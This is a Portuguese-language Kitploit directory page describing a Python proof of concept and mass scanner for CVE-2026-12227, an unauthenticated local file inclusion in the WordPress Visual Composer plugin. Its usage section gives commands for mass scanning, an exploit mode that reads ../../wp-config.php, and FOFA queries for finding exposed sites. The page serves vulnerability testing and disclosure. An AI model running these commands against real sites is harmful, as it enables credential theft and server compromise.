Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-12227 — PoC e scanner em Python 3 para CVE-2026-12227, uma inclusão local de arquivo não autenticada no WordPress Visual Composer Website Builder através do parâmetro vcv-template. | Kitploit
Ferramentas/GitHubGitHub/murrez/cve-2026-12227
ReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubmurrez/cve-2026-12227

CVE-2026-12227

PoC e scanner em Python 3 para CVE-2026-12227, uma inclusão local de arquivo não autenticada no WordPress Visual Composer Website Builder através do parâmetro vcv-template.

1há 10h 1mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
Compartilhar

CVE-2026-12227 — Visual Composer Website Builder LFI Não Autenticado

PoC em Python 3 para CVE-2026-12227 (Wordfence): Local File Inclusion através do parâmetro de consulta vcv-template no Visual Composer Website Builder (visualcomposer no wordpress.org).

PlataformaPlugin WordPress
ComponenteVisual Composer Website Builder
Afetado≤ 45.16.0
Corrigido em> 45.16.0 (WP Trac 3619572) — use a versão estável mais recente (ex.: 45.16.3+)
CVSS9.8 Crítico (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
AutenticaçãoNão autenticado
CWECWE-98
Não éWPBakery (js_composer) ou SAP NetWeaver Visual Composer

Resumo

Em versões vulneráveis, carregamentos de páginas públicas honram o vcv-template controlado pelo atacante (com vcv-template-type) durante o tratamento de template_include do WordPress dentro de PageTemplatesController. Isso pode incluir arquivos escolhidos pelo atacante no disco; arquivos PHP podem ser executados (RCE). O Wordfence observa cadeias com extensões "seguras" enviadas em algumas configurações.

Superfície de ataque

  • Requer o plugin instalado e uma página de front-end construída com VC (permalink normal).
  • A sondagem adiciona parâmetros de consulta, ex.: ?vcv-template-type=vc&vcv-template=blank ou caminhos LFI sob vcv-template.
  • Parâmetros relacionados: vcv-template-type, vcv-template-stretched.

Requisitos

root@kitploit:~
pip install -r requirements.txt

Python 3.8+.

Uso

root@kitploit:~
# Version + plugin + VC page crawl + template/LFI probes
python poc.py -u https://target.example --mode check

# Known VC landing page
python poc.py -u https://target.example --mode check --page-url /

# Mass scan
python poc.py --list targets.example.txt --mode check --threads 25 --quiet

# Custom include path (authorized testing only)
python poc.py -u https://target.example --mode exploit --page-url / --file ../../../../../../wp-config.php

# JSON for scripting
python poc.py -u https://target.example --mode check --json

Saída

ArquivoSignificado
cve_2026_12227_results.jsonlJSON completo por alvo

Valores de status

Dicas FOFA

root@kitploit:~
body="/wp-content/plugins/visualcomposer/"
body="data-vcv-" && body="wp-content"

Notas técnicas

  • Caminho do código: visualcomposer/Modules/Editors/Settings/PageTemplatesController.php (getCurrentTemplateLayout, viewPageTemplate).
  • Check trata controle de parâmetro ou marcadores LFI como exploitable_candidate; confirme em um clone de staging antes de assumir RCE.
  • Addons premium TemplateFilter / theme-builder podem ampliar caminhos alcançáveis em alguns sites.

Legal

Use apenas em sistemas que você possui ou tem permissão explícita para testar.

Baixar ferramenta
hits.txtHostnames candidatos
candidates.jsonlResumo do modo check (page_url, status, lfi)
StatusSignificado
lfi_confirmedResposta corresponde às heurísticas de wp-config / /etc/passwd / version.php
vcv_template_controllablevcv-template=blank altera o layout em relação à linha de base (parâmetro de vulnerabilidade honrado)
plugin_vuln_no_surfaceVersão antiga do plugin, mas nenhuma página VC ou parâmetro ignorado
no_vc_pagePlugin presente, sem marcadores VC nos caminhos rastreados
patchedVersão > 45.16.0